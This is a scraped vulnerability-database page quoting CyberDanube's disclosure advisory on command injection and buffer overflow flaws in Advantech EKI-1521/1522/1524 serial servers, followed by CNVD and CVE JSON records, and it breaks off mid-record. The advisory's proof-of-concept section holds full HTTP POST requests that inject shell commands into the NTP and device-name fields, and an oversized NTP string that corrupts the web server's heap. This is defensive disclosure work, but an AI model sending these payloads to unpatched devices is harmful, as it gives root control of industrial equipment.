https://www.cyberdanube.com\n-------------------------------------------------------------------------------\n\nVendor description\n-------------------------------------------------------------------------------\n\"Advantech\\x92s corporate vision is to enable an intelligent planet. The company\nis a global leader in the fields of IoT intelligent systems and embedded\nplatforms. To embrace the trends of IoT, big data, and artificial intelligence,\nAdvantech promotes IoT hardware and software solutions with the Edge\nIntelligence WISE-PaaS core to assist business partners and clients in\nconnecting their industrial chains. Advantech is also working with business\npartners to co-create business ecosystems that accelerate the goal of\nindustrial intelligence.\"\n\nSource: https://www.advantech.com/en/about\n\n\nVulnerable versions\n-------------------------------------------------------------------------------\nEKI-1524-CE series / 1.21\nEKI-1522-CE series / 1.21\nEKI-1521-CE series / 1.21\n\nVulnerability overview\n-------------------------------------------------------------------------------\n1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)\nThe web server of the device is prone to two authenticated command injections. \nThese allow an attacker to gain full access to the underlying operating system\nof the device. This device class can be attached to legacy systems via RS-232,\nRS-422 or RS-485. Such peripheral systems can be affected by attacks to the\ndevice from malicious actors. \n\n2) Buffer Overflow (CVE-2023-2575)\nThe web server is prone to a buffer overflow, triggered due to missing input\nlenght validation in the NTP input field. According to the vendor, the NTP\nserver string is expected to be 64 bytes long, which is not correctly checked. \n\nProof of Concept\n-------------------------------------------------------------------------------\n1) Authenticated Command Injection\nThe web server is prone to two authenticated command injections via POST\nparameters. The following proof-of-concepts show how to inject commands to the\nsystem which gets executed with root permissions in the background:\n\n1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)\nThe following POST request executes the command \\x93;ping 10.0.0.1\\x94 on the system:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=;ping+10.0.0.1;\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nIt is also possible to execute this command without any interceptor proxy by\nenclose it with \";\", which results in the string \\x93;ping 10.0.0.1;\\x94. \n\n1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)\nThe device name can also be abused for command injection. It is only executed\non reboot, but this can also be done via the device\\x92s web-interface. A POST\nrequest which injects the command \\x93;ls /etc;\\x94 can be looks like the following:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=;ls+/etc;\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nSuch command can also be injected by setting the device name to \\x93;ls /etc;\\x94. \n\n\n2) Buffer Overflow (CVE-2023-2575)\nThe following POST request can be used to trigger a buffer overflow\nvulnerability in the web server:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.97\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 823\nOrigin: http://172.16.0.97\nConnection: close\nReferer: http://172.16.0.97/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=7\u0026min_name=2\u0026sec_name=52\u0026tz=UTC12%3A0\u0026ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n===============================================================================\n\nThe serial port of the device provides error messages, which already indicate\nthat the stack has been corrupted:\n/ # *** Error in `./index.cgi\u0027: free(): invalid next size (normal): 0x00069828 ***\n*** Error in `./index.cgi\u0027: malloc(): memory corruption: 0x00069898 ***\n\nFurthermore, the forked child processes seem to remain in the process list as\nzombies - three buffer overflows were triggered in this case:\n/ # ps\nPID USER COMMAND\n[...]\n 935 root ./index.cgi func=setsys\n 959 root ./index.cgi func=setsys\n 983 root ./index.cgi func=setsys\n[...]\n\n\nThe vulnerabilities were manually verified on an emulated device by using the\nMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). \n\n\nSolution\n-------------------------------------------------------------------------------\nUpdate the product to the latest available firmware version. \n\n\nWorkaround\n-------------------------------------------------------------------------------\nNone\n\n\nRecommendation\n-------------------------------------------------------------------------------\nCyberDanube recommends Advantech customers to upgrade the firmware to the\nlatest version available. \n\n\nContact Timeline\n-------------------------------------------------------------------------------\n2023-03-08: Contacting Advantech via Service Request form; No answer. \n2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz);\n Vendor confirmed vulnerabilities and will provide a fixed firmware\n until 2023-05-13. Asked vendor for affected models; Vendo\n responded that EKI-1524/1522/1521 series are affected. \n2023-03-20: Asked for status update. \n2023-03-21: Vendor responded that the firmware is currently under testing. \n2023-03-31: Vendor statet, that firmware is done and sent it via email; Found\n additional issues and responded to vendor. \n2023-04-01: Vendor asked multiple question. \n2023-04-02: Responded to vendor, answered questions and asked for a call;\n Vendor agreed. \n2023-04-04: Set date for a call to 2023-04-10. \n2023-04-10: Clarified further issues. \n2023-04-23: Vendor sent notification that a beta release of the firmware is\n available. \n2023-05-02: Vendor sent notification that a new firmware release is online. \n2023-05-04: Asked vendor if the advisory can be published earlier than agreed. \n2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities\n have been fixed. \n2023-05-11: Coordinated release of security advisory. \n\nWeb: https://www.cyberdanube.com\nTwitter: https://twitter.com/cyberdanube\nMail: research at cyberdanube dot com\n\nEOF S. Dietz, T. Weber / @2023\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"db": "VULMON",
"id": "CVE-2023-2575"
},
{
"db": "PACKETSTORM",
"id": "172307"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-2575",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "172307",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009954",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2023050038",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202305-381",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-2575",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-2575"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
]
},
"id": "VAR-202305-0474",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2023-12-18T11:54:15.829000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Advantech Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=237364"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"db": "NVD",
"id": "CVE-2023-2575"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bed3"
},
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bect"
},
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bebl"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/172307/advantech-eki-15xx-series-command-injection-buffer-overflow.html"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2023/may/4"
},
{
"trust": 2.4,
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2575"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2023050038"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-2575/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://172.16.0.100/cgi-bin/index.cgi"
},
{
"trust": 0.1,
"url": "http://172.16.0.97"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2573"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2574"
},
{
"trust": 0.1,
"url": "https://www.advantech.com/en/about"
},
{
"trust": 0.1,
"url": "https://advantech.com"
},
{
"trust": 0.1,
"url": "https://medusa.cyberdanube.com)."
},
{
"trust": 0.1,
"url": "https://twitter.com/cyberdanube"
},
{
"trust": 0.1,
"url": "http://172.16.0.100"
},
{
"trust": 0.1,
"url": "https://www.cyberdanube.com"
},
{
"trust": 0.1,
"url": "http://172.16.0.97/cgi-bin/index.cgi"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-2575"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-2575"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2023-2575"
},
{
"date": "2023-12-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"date": "2023-05-12T16:24:23",
"db": "PACKETSTORM",
"id": "172307"
},
{
"date": "2023-05-08T13:15:09.847000",
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"date": "2023-05-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2023-2575"
},
{
"date": "2023-12-07T04:51:00",
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"date": "2023-05-12T18:15:09.827000",
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"date": "2023-05-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Out-of-bounds write vulnerability in multiple Advantech products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
],
"trust": 0.6
}
}
var-202103-1654
Vulnerability from variot
EKI-1524 is a serial device networking server.
Advantech EKI-1524 has a denial of service vulnerability, which can be exploited by an attacker to cause the device to automatically restart.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202103-1654",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "eki-1524",
"scope": "eq",
"trust": 0.6,
"vendor": "advantech",
"version": "1.09"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-09535",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2021-09535",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "EKI-1524 is a serial device networking server.\n\r\n\r\nAdvantech EKI-1524 has a denial of service vulnerability, which can be exploited by an attacker to cause the device to automatically restart.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-09535",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
]
},
"id": "VAR-202103-1654",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
]
},
"last_update_date": "2022-05-04T10:25:26.204000Z",
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-03-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-09535"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-02-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-09535"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524 has a denial of service vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-09535"
}
],
"trust": 0.6
}
}
cve-2023-4202
Vulnerability from cvelistv5
Published
2023-08-08 10:24
Modified
2024-10-10 17:49
Severity ?
EPSS score ?
Summary
Stored Cross-Site Scripting
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:17:12.028Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"exploit",
"x_transferred"
],
"url": "https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Aug/13"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/174153/Advantech-EKI-1524-CE-EKI-1522-EKI-1521-Cross-Site-Scripting.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "eki-1524",
"vendor": "advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "eki-1522",
"vendor": "advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "eki-1521",
"vendor": "advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-4202",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-10T17:46:57.341604Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-10T17:49:00.238Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EKI-1524",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1522",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1521",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "R. Haas"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "A. Resanovic"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "T. Etzenberger"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "M. Bineder"
}
],
"datePublic": "2023-08-08T10:13:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAdvantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the device name field of the web-interface.\u003c/span\u003e\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the device name field of the web-interface.\n\n\n"
}
],
"impacts": [
{
"capecId": "CAPEC-63",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-63 Cross-Site Scripting (XSS)"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-08T10:24:40.086Z",
"orgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"shortName": "CyberDanube"
},
"references": [
{
"tags": [
"third-party-advisory",
"exploit"
],
"url": "https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Aug/13"
},
{
"url": "http://packetstormsecurity.com/files/174153/Advantech-EKI-1524-CE-EKI-1522-EKI-1521-Cross-Site-Scripting.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Stored Cross-Site Scripting",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"assignerShortName": "CyberDanube",
"cveId": "CVE-2023-4202",
"datePublished": "2023-08-08T10:24:40.086Z",
"dateReserved": "2023-08-07T10:45:04.633Z",
"dateUpdated": "2024-10-10T17:49:00.238Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-4203
Vulnerability from cvelistv5
Published
2023-08-08 10:29
Modified
2024-10-10 17:46
Severity ?
EPSS score ?
Summary
Stored Cross-Site Scripting
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:17:12.212Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Aug/13"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/174153/Advantech-EKI-1524-CE-EKI-1522-EKI-1521-Cross-Site-Scripting.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "eki-1524",
"vendor": "advantech",
"versions": [
{
"lessThanOrEqual": "1.24",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
